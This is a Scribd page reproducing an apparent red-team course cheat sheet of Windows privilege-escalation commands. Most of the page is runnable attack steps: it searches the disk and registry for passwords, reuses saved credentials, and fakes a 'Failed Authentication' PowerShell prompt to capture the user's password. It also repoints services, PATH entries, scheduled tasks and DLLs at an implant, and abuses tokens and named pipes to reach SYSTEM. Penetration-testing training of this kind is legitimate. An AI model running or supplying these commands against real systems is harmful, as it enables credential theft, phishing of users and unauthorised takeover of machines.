Scribd
Upload
18 views5 pages

Commands

The document outlines various privilege escalation techniques for Windows systems, including methods to exploit low-hanging passwords, unsecured services, and credential managers. It provides specific commands and scripts for executing these techniques, as well as instructions for reconfiguring services and tasks to gain elevated privileges. Additionally, it covers DLL hijacking and UAC bypass exploits as part of the overall strategy to gain system access.

Uploaded by

garvsanwariya60
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
18 views5 pages

Commands

The document outlines various privilege escalation techniques for Windows systems, including methods to exploit low-hanging passwords, unsecured services, and credential managers. It provides specific commands and scripts for executing these techniques, as well as instructions for reconfiguring services and tasks to gain elevated privileges. Additionally, it covers DLL hijacking and UAC bypass exploits as part of the overall strategy to gain system access.

Uploaded by

garvsanwariya60
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 5

RED TEAM Operator: Privilege Escalation in Windows - commands:

==============================================================

## CREDENTIALS

+ "Low Hanging Passwords"


---------------------------------------------------------
dir /b /a /s c:\ > c:\rto\c-dirs.txt
type c:\rto\c-dirs.txt | findstr /i passw

+ "The X Files" - Interesting Files


---------------------------------------------------------
type c:\rto\c-dirs.txt | findstr /i ssh
type c:\rto\c-dirs.txt | findstr /i kdbx
type c:\rto\c-dirs.txt | findstr /i vnc

Good targets:
install,
backup, .bak, .log, .bat, .cmd, .vbs, .cnf, .conf, .config, .ini, .xml, .txt, .gpg,
.pgp, .p12, .der, .csr, .cer, id_rsa, id_dsa, .ovpn, .rdp, vnc, ftp, ssh, vpn, git,
.kdbx, .db
unattend.xml
Unattended.xml
sysprep.inf
sysprep.xml
VARIABLES.DAT
setupinfo
setupinfo.bak
web.config
SiteList.xml
.aws\credentials
.azure\accessTokens.json
.azure\azureProfile.json
gcloud\credentials.db
gcloud\legacy_credentials
gcloud\access_tokens.db

+ "Swimming in Hives" - Registry


---------------------------------------------------------
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query "HKCU\Software\OpenSSH\Agent\Keys"
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

+ "A Boss with Creds" - Abusing Credential Manager


---------------------------------------------------------
cmdkey /list
runas /savecred /user:admin cmd.exe
runas /savecred /user:admin c:\rto\lpe\implant\implant.exe
runas /savecred /user:admin "c:\windows\system32\cmd /c dir /b /a /s c:\users\admin
> c:\rto\admin.txt"

+ "The King is Naked" - Robbing Credential Manager


---------------------------------------------------------
powershell Import-Module c:\rto\lpe\cms.ps1 ; Enum-Creds

+ "A Thief" - Asking User for Creds


---------------------------------------------------------
powershell "$cred = $host.ui.promptforcredential('Failed Authentication','',
[Environment]::UserDomainName+'\'+[Environment]::UserName,
[Environment]::UserDomainName); $cred.getnetworkcredential().password"

powershell "$cred = $host.ui.promptforcredential('Failed Authentication','',


[Environment]::UserDomainName+'\'+'admin',[Environment]::UserDomainName);
$cred.getnetworkcredential().password"

## UNSECURED OBJECTS

+ "Boundless Servant" - Unsecured Service [1]


---------------------------------------------------------
searching for all unquoted service binary paths:
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i
/v "c:\windows\\" |findstr /i /v """

+ "Lonely Vassal"- Unsecured Service [2]


---------------------------------------------------------
c:\rto\tools\si\accesschk.exe -accepteula -wuvc "Everyone" *
c:\rto\tools\si\accesschk.exe -accepteula -wuvc "Users" *
c:\rto\tools\si\accesschk.exe -accepteula -wuvc "Authenticated Users" *

checking sshd service configuration and status:


sc query sshd
sc qc sshd

reonfiguration and exploitation:

sc config sshd binPath= "c:\rto\lpe\implant\implant.exe"


sc start sshd

reverting the changes:


sc stop sshd
sc config sshd binPath= "c:\Program Files\OpenSSH\sshd.exe"

+ "Hornets' Nest"- Unsecured Service [3]


---------------------------------------------------------
c:\RTO\Tools\SI\accesschk.exe -accepteula -kvuqsw hklm\System\CurrentControlSet\
services > c:\rto\regs.txt

reconfiguring vulnerable service:


reg query HKLM\SYSTEM\CurrentControlSet\services\IKEEXT
reg add HKLM\SYSTEM\CurrentControlSet\services\IKEEXT /v ImagePath /t REG_EXPAND_SZ
/d C:\rto\lpe\implant\implantsrv.exe /f

restart the machine or run as admin:


sc stop ikeext
sc start ikeext
reverting the changes:
reg add HKLM\SYSTEM\CurrentControlSet\services\IKEEXT /v ImagePath /t REG_EXPAND_SZ
/d "%systemroot%\system32\svchost.exe -k netsvcs -p" /f

## EXECUTION FLOW HIJACKING

+ "Folding Papers"- Unsecured File System


---------------------------------------------------------
c:\rto\tools\si\accesschk.exe -accepteula -wus "Users" c:\*.* > c:\rto\fld-usr.txt
c:\rto\tools\si\accesschk.exe -accepteula -wus "Authenticated Users" c:\*.* > c:\
rto\fld-authusr.txt
notep

+ "Hi Jack, Show Me THE WAY" - Exploiting PATH


---------------------------------------------------------
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment"
icacls c:\rto\bin
copy c:\windows\system32\cmd.exe c:\rto\bin\notepad.exe

reverting the changes:


del c:\rto\bin\notepad.exe

+ "Closed. No Service" - Missing Service


---------------------------------------------------------
c:\RTO\Tools\si\autorunsc64.exe -a s | more
sc query AdobeUpdate
sc qc AdobeUpdate
copy c:\RTO\LPE\implant\implantsrv.exe c:\rto\bin\AdobeUpdate.exe

restart the machine or run as admin:


sc stop AdobeUpdate
sc start AdobeUpdate

reverting the changes:


del c:\rto\bin\AdobeUpdate.exe

+ "Jobless" - Missing Task


---------------------------------------------------------
c:\RTO\Tools\si\autorunsc64.exe -a t | more
schtasks /query /tn OneDriveChk /xml

converting SID to username:


wmic useraccount where sid='S-1-5-21-3461203602-4096304019-2269080069-1003' get
name

copy c:\RTO\LPE\implant\implant.exe C:\RTO\bin\OneDriveChk.exe

reverting the changes:


del C:\RTO\bin\OneDriveChk.exe
+ "Library Has Fallen" - DLL Hijacking
---------------------------------------------------------
compile with 32-bit compiler:
cd c:\RTO\LPE\DLL-hijack
compile.bat
copy c:\RTO\LPE\DLL-hijack\winmm.dll c:\RTO\Tools\putty\

reverting the changes:


del c:\RTO\Tools\putty\winmm.dll

+ "You Ain't Corner Me" - UACME


---------------------------------------------------------
repo with up-to-date UAC bypass exploits:
https://github.com/hfiref0x/UACME

## GETTING SYSTEM

+ "! NeverRemoveDepressed" - AlwaysInstallElevated Hack


---------------------------------------------------------
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v
AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v
AlwaysInstallElevated

+ "Hi, Sis!" - New Service for SYSTEM


---------------------------------------------------------
run from elevated admin cmd/console:
sc create lol binPath= "c:\RTO\LPE\implant\implant.exe"
sc start lol
sc stop lol
sc delete lol

+ "Chip & Dance Show" - Abusing Tokens [2]


---------------------------------------------------------
reg query HKLM\SYSTEM\CurrentControlSet\services\IKEEXT
reg add HKLM\SYSTEM\CurrentControlSet\services\IKEEXT /v ImagePath /t REG_EXPAND_SZ
/d c:\RTO\LPE\2SYSTEM\TokenDance\tokendance.exe /f

restart the machine or run as admin:


sc stop ikeext
sc start ikeext

reverting the changes:


reg add HKLM\SYSTEM\CurrentControlSet\services\IKEEXT /v ImagePath /t REG_EXPAND_SZ
/d "%systemroot%\system32\svchost.exe -k netsvcs -p" /f

+ "Broken Calumet Exposed" - Exploiting Named Pipes [2]


---------------------------------------------------------
compile piper in VS command line (as user rto)
cd \RTO\LPE\2SYSTEM\Piper
compile.bat

run from elevated admin cmd/console:


cd \RTO\LPE\2SYSTEM\Piper
piper.exe

You might also like